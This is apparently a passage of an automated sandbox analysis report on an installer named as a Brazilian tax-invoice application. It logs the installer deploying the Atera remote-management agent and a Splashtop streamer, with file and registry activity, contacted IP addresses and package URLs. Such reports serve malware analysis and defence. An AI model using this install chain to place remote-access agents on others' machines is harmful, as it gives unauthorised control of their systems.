                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F4E20 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,35_2_00007FFDEE3F4E20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F4DE0 CryptReleaseContext,35_2_00007FFDEE3F4DE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F4BC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,35_2_00007FFDEE3F4BC0
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll
Source: C:\Windows\System32\msiexec.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | File created: C:\Windows\system32\InstallUtil.InstallLog
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe | File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\AteraSetupLog.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe | File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe | File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe | File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe | File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: Binary string: \??\C:\Windows\dll\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F3B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdbSHA256j source: CliWrap.dll.26.dr
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1762341854.00000177B8112000.00000002.00000001.01000000.00000011.sdmp, Pubnub.dll0.1.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1762341854.00000177B8112000.00000002.00000001.01000000.00000011.sdmp, Pubnub.dll0.1.dr
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdbdditio source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000002.2462648805.0000022B9AFD2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileProviders.Abstractions/Release/net8.0/Microsoft.Extensions.FileProviders.Abstractions.pdbSHA256 source: Microsoft.Extensions.FileProviders.Abstractions.dll0.26.dr
                                Source: C:\Windows\System32\msiexec.exe File opened: z:
                                Source: C:\Windows\System32\msiexec.exe File opened: x:
                                Source: C:\Windows\System32\msiexec.exe File opened: v:
                                Source: C:\Windows\System32\msiexec.exe File opened: t:
                                Source: C:\Windows\System32\msiexec.exe File opened: r:
                                Source: C:\Windows\System32\msiexec.exe File opened: p:
                                Source: C:\Windows\System32\msiexec.exe File opened: n:
                                Source: C:\Windows\System32\msiexec.exe File opened: l:
                                Source: C:\Windows\System32\msiexec.exe File opened: j:
                                Source: C:\Windows\System32\msiexec.exe File opened: h:
                                Source: C:\Windows\System32\msiexec.exe File opened: f:
                                Source: C:\Windows\System32\msiexec.exe File opened: b:
                                Source: C:\Windows\System32\msiexec.exe File opened: y:
                                Source: C:\Windows\System32\msiexec.exe File opened: w:
                                Source: C:\Windows\System32\msiexec.exe File opened: u:
                                Source: C:\Windows\System32\msiexec.exe File opened: s:
                                Source: C:\Windows\System32\msiexec.exe File opened: q:
                                Source: C:\Windows\System32\msiexec.exe File opened: o:
                                Source: C:\Windows\System32\msiexec.exe File opened: m:
                                Source: C:\Windows\System32\msiexec.exe File opened: k:
                                Source: C:\Windows\System32\msiexec.exe File opened: i:
                                Source: C:\Windows\System32\msiexec.exe File opened: g:
                                Source: C:\Windows\System32\msiexec.exe File opened: e:
                                Source: C:\Windows\Temp\SplashtopStreamer.exe File opened: c:
                                Source: C:\Windows\System32\msiexec.exe File opened: a:
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B371A44h 12_2_00007FFD9B371895
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B371FFFh 12_2_00007FFD9B371895
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B371FFFh 12_2_00007FFD9B371EA1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B371FFFh 12_2_00007FFD9B371EB6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B371FFFh 12_2_00007FFD9B371E7E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B371873h 12_2_00007FFD9B370C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B37227Bh 12_2_00007FFD9B370C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B384ECBh 13_2_00007FFD9B384C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B381873h 13_2_00007FFD9B380C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B38227Bh 13_2_00007FFD9B380C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B39B962h 13_2_00007FFD9B39B606
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B384ECBh 13_2_00007FFD9B384E45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B39B962h 13_2_00007FFD9B39B610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B374ECBh 26_2_00007FFD9B374E6B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B594729h 26_2_00007FFD9B59468C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Code function: 4x nop then jmp 00007FFD9B592DB0h 26_2_00007FFD9B592BD0

                                Networking

                                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.119.152.241 443
                                Source: Yara match File source: 20.0.AgentPackageAgentInformation.exe.2156b880000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 49.2.AgentPackageProgramManagement.exe.153fe540000.6.unpack, type: UNPACKEDPE
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: Joe Sandbox View IP Address: 40.119.152.241
                                Source: Joe Sandbox View IP Address: 35.157.63.227
                                Source: Joe Sandbox View IP Address: 13.35.58.89
                                Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.Z
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.WATCHDOG/2.0/AGENT.PACKAGE.WATCHDOG.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEADREMOTE/6.0/AGENTPACKAGEADREMOTE.ZIP
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/38.8/AGENTPACKAGEAGENTINFORMATI
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEINTERNALPOLLER/23.8/AGENTPACKAGEINTERNALPOLLER.Z
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMARKETPLACE/1.6/AGENTPACKAGEMARKETPLACE.ZIP
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/38.1/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEOSUPDATES/30.3/AGENTPACKAGEOSUPDATES.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLE
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIP
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216304E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acontrol.atera.com/
0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E1E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001C7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 
0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B090000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1985317540.000002156C3F5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1985299370.0000015E7E13A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 
0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt9z
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.rawgit.com/chocolatey/chocolatey-coreteampackages/50fd97744110dcbce1acde889c0870599c9d558
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538094B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801EC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380235000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380501000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538094B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/8
